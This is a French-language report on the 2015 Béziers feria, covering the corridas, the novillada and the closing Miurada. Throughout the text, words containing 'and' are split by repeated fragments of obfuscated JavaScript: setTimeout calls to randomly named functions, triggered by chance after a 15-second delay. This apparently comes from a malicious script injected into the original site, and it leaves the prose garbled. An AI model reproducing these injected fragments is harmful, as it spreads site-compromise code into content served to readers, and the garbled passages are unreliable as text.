BEZIERS 2015 TRIOMPHES DE CASTELLA ET MANZANARES

La feria de Béziers commenca le 13 aout 2015 avec une apres-midi pluvieuse. Cette année encore le même president Michel Daude assurera la présidence de toutes les corridas et de la novillada piquée. Le ténor ouvrira le paseo avec l’air de Carmen. Au chapitre des changements, la commission taurine a decidé que la sortie par la grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande porte serait donnée au torero qui coupera deux oreilles à un même toro.Grise comme le temps qui, après l'orage de l'après-midi, aura tout de même épargné de la pluie les spectateurs qui garnissaient copieusement les tendidos des arènes du plateau de Valras.

Photos de  Mikael Fortes

[simpleviewer gallery_id="112"]

Une ouverture en demi-teinte due en grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande partie au peu de jeu proposé par les toros, que ce soit le San Pelayo et le Capea, réservés et de peu de recorrido, pour Pablo Hermoso de Mendoza ou les Jandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andilla du mano a mano Castella et Perera devant des toros arrêtés et qui ne donnèrent aucun jeu à la muleta par manque de race et d’émotion . Et comme l'épée ne fut pas toujours au rendez-vous, le résultat statistique en est resté sur un score inhabituellement restreint pour un cartel aussi relevé.

Le lendemain 14 aout le cartel phare de la feria avec la deuxième corrida de Sébastien Castella.Cette année, pour cause de changement du règlement local d'obtention des triomphes, seuls Castella et Manzanares sont sortis à dos d'hommes de la plaza de toros. Juan Bautista devant se contenter pour sa part d'une sortie à sortie à pied, chaleureusemment acclamée, par la porte des cuadrillas.On ne pourra pas reprocher à l'Arlésien, qui a touché le lot le moins propice d'un encierro de Domingo Hernandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andez/Garcigrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande qui donna du jeu en général, de ne pas avoir tout tenté pour forcer son destin. D'ailleurs, le public ne s'y est pas trompé qui a réclamé avec force l'octroi de la deuxième oreille du quatrième toro de la tarde, synonyme de sortie a hombros pour le Camarguais... Pétition qui n'a pas trouvé grâce aux yeux du Président, seul décisionnaire en la matière.

Sebastian Castella a été à la hauteur de sa temporada 2015 triomphale, ne laissant pas passer l'occasion d'un nouveau succès dans les arènes de sa ville. Succès qui aurait même pu être plus important sans un pinchazo sur son premier.

José Maria Manzanares, fut gêné par le vent lors de son premier combat, renversa la situation face au dernier de l'envoi, le plus noble du lot, embarquant les arènes dans les plis d'une muleta aussi soyeuse que lente. La troisième corrida de toros de la Feria de Béziers 2015 s'est terminée sur un score de parité d'une oreille partout. Les toros de Robert Margé aux comportements irreguliers. Car au final, seul l'exemplaire de belle transmission, sorti en quatrième position pour Manuel Escribano, se hissera à la hauteur de la réputation et des belles heures offertes par les pensionnaires des Monteilles ces dernières années, en ces mêmes arènes. Superbement présentés, les toros de l'empresa biterrois ont globalement manqué de fond, les meilleurs se révélant être le bon quatrième et le cinquième, maniable.

L'histoire retiendra la nouvelle confirmation que l'octroi de la deuxième oreille appartient bien au Président de la course, et à personne d'autre... A Béziers comme ailleurs. Toutefois, il semblerait bien que ce soit plus facile de l'obtenir quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and on s'appelle Manzanares. Manuel Escribano est allé a porta gayola saluer son toro, a bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anderillé brillamment dont une dernière paire au quiebro de tous les dangers contre les planches, avant de livrer une belle faena majoritairement droitière certes, mais toujours sincère et engagée avant une épée peut-être un peu sur le cöté. Mais celle de l'Alicantin ne l'était-elle pas aussi?

A titre personnel, je retiendrai également l'oreille obtenue avec beaucoup d'abnégation par Cayetano Ortiz, fort justement reconduit dans les arènes qui ont forgé son aficion, après son triomphe de l'an passé. Quant à Fandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andiño, il m'a semblé en net progrès par rapport à ses dernières prestations dans le Sud-Est, même si l'ensemble reste un peu brouillon et accroché. Le dimanche 16 août les arènes de Béziers proposaient en matinée une novillada au cartel très attractif. Un cartel international face aux pensionnaires de la ganaderia andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andalouse de Virgen Maria et Santa Ana, faibles et deslucidos en general. Posada de Maravillas, torero fin et artiste, coupa deux oreilles une a chaque toro où il distilla des muletazos de qualite. Il remporta le Tastevin d’Argent décerné par l'union taurine biteroise. L' Arlésien Lilian Ferrani, novillero généreux qui effectue une bonne temporada et le péruvien Andres Roca Rey, étoile montante de la tauromachie qui prendra son alternative dans un peu plus d'un mois sur le sable Nîmois, ont laissé des uniquement des détails car les novillos manquaient de race, de mobilité agrementer avec une faiblesse endemique .La Feria de Béziers 2015 s'est clôturée par la traditionnelle Miurada qui, cette année, n'a offert que peu de possibilités de triomphe aux trois courageux appelés à la combattre. Au final, JavierCastaño et Mehdi Savalli se partagent les deux seules oreilles laissées sur le sable de la Plaza de Toros du Plateau de Valras par les pensionnaires de Zahariche.Mais l'impression générale à la sortie des arènes était bonne. Et ce en grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande partie grâce aux deux prestations de Mehdi Savalli, très apprécié en terres biterroises, qui a su une nouvelle fois et sans que ce terme n'ait quoi que ce soit de péjoratif dans le texte, livrer une tauromachie populaire mais de bon goût, aux spectateurs venus profiter d'un bon moment, encore que ce terme soit un poil galvaudé s'agissant d'une Miurada (...), dans les arènes de Béziers.

Les commentaires sont fermés.